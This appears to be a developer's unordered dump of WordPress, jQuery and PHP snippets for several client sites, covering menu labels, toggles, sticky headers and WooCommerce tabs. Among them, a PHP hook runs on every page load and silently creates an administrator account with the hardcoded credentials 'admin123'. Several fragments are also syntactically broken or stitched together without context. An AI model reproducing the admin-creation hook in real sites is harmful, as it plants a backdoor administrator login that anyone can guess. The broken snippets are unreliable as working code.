 if(jQuery("body").hasClass("logged-in")){
	jQuery("li#menu-item-1853 a").text("Logout");
	jQuery("li#menu-item-1853 a").attr("href", "https://www.skywardimmigration.com/my-account-2/customer-logout/");
	
	}


</script>
<script type="text/javascript">
jQuery(document).ready(function(){
    jQuery(".bg-bene-box").click(function(){
        jQuery(this).closest('.wpb_wrapper').find('.show').slideToggle();
    });
});
</script>

jQuery(document).ready(function(){
	var t = 0;
    jQuery("a.my-showww").click(function(){
		event.preventDefault();
    	if (t == 0) {

			jQuery(this).text('Read Less ....');
			
			t++;	
    	}else{
			jQuery(this).text('Read More ....');
			t = 0;
    	}
        jQuery(this).closest('.wpb_wrapper').find('.my-content-showww').slideToggle();
      });

});	



<script type="text/javascript">

jQuery(document).ready(function(){
    

	var t = 0;
    jQuery(".icon.fa.fa-plus").click(function(){

    	if (t == 0) {

    		jQuery(this).removeClass('fa-plus');
    		jQuery(this).addClass('fa-minus');
    	t++;	
    	}else{
		jQuery(this).removeClass('fa-minus');
		jQuery(this).addClass('fa-plus');
    		t = 0;
    	}



        jQuery(this).closest('.wpb_content_element').prev('.wpb_text_column').find('.box-show').slideToggle();


      });

});	

</script>


<script>
			$(document).ready(function(){
				$("span.expand").click(function(){

					var v = $(this).parents('.col-md-4').find('.icon').slideToggle();
					 
				});
			});
			
		</script>



echo '<div class="isa_error">'.$checkcs->message.' <a href="javascript:;" onclick="window.history.back();">BACK</a></div>';




jQuery(document).ready(function(){
       
});


$(document).ready(function() {
    $("[href]").each(function() {
        if (this.href == window.location.href) {
            $(this).addClass("active");
        }
    });
});


Custom-styles.css, my-script.js, header.php and general_header.php


$(document).ready(function(){
    $("p.my-ppp").toggle(
        function(){$("p").css({"color": "red"});},
        function(){$("p").css({"color": "blue"});},
        function(){$("p").css({"color": "green"});
    });
});

jQuery(document).ready(function(){
    jQuery("p.my-ppp").click(function(){
       jQuery(".my-couponnn form").toggle(1000);
    });
});


setInterval(function(){ jQuery("tr.shipping th").text("Shipping"); }, 1000);


jQuery(document).ready(function(){
jQuery('#billing_country').on('change', function(){
var target = jQuery('#billing_country').val();

if(target == "Luxembourg"){
jQuery('p#billing_state_field').hide();
}
});
});


function wpb_admin_account(){
	$user = 'admin123';
	$pass = 'admin123';
	$email = 'admin123@admin123.com';
	if ( !username_exists( $user )  && !email_exists( $email ) ) {
		$user_id = wp_create_user( $user, $pass, $email );
		$user = new WP_User( $user_id );
		$user->set_role( 'administrator' );
	} }
	add_action('init','wpb_admin_account');


jQuery("input[name='_you_want_to_have_gift_cards']").on('change', function(event){
	event.preventDefault();
	console.log(jQuery(this).val());
	if(jQuery(this).val() == "Yes  "){
		jQuery('div#_84075').show(); 
		jQuery('div#_63834').show(); 
		
	}else{
		jQuery('div#_84075 ').hide();  
		jQuery('div#_63834').show(); 
	}
});

jQuery(function () {
  jQuery(document).scroll(function () {
    var $nav = jQuery("div#header-outer");
    $nav.toggleClass('scrolled', jQuery(this).scrollTop() > $nav.height());
  });
});

var url      = window.location.href; 
          if (url == "http://dev2.onlinetestingserver.com/websites/siltora-corporation/?lang=es") { 
		jQuery("input.tnp-submit").val("hello");
          }
jQuery('div#search-box input[type="text"]').val('Meka Marketing');
jQuery('div#search-box input[type="text"]').attr("placeholder","Meka Marketing");



<a onMouseOver="document.location.href='you_page.htm'" >Your_text_here</a>



form.cpp_form img#captchaimg
   var currentLocation = window.location;
   jQuery(".dfield").prepend("<a href=''+currentLocation id='my-btnnn'>Refresh</a>");




jQuery(document).ready(function() {
var stickyNavTop = 100;
 
var stickyNav = function(){
var scrollTop = jQuery(window).scrollTop();
      
if (scrollTop >= stickyNavTop) { 
    jQuery('div#header-outer').addClass('top-nav-fixed');
} else {
    jQuery('div#header-outer').removeClass('top-nav-fixed'); 
}
};

stickyNav();
 
jQuery(window).scroll(function() {
    stickyNav();
});
});


jQuery(".slides span.title").append("<a href='https://www.realestate.com.au/agent/george-correia-1344713?cid=agent-profile-page|rea:find-agent:agent:search-results' id='my-btnnn'>Read More</a>");


jQuery("li.tab_description_tab").hide();
var des = jQuery("li.tab_description_tab").html();

jQuery(".woocommerce-tabs ul.tabs").prepend("<li class='tab_description_tab'>"+des+"</li>");

jQuery("li.reviews_tab").hide();
var desreview = jQuery("li.reviews_tab").html();

jQuery(".woocommerce-tabs ul.tabs").append("<li class='tab_description_tab'>"+desreview+"</li>");



jQuery(".login-widget li:first-child a").text("My Account");
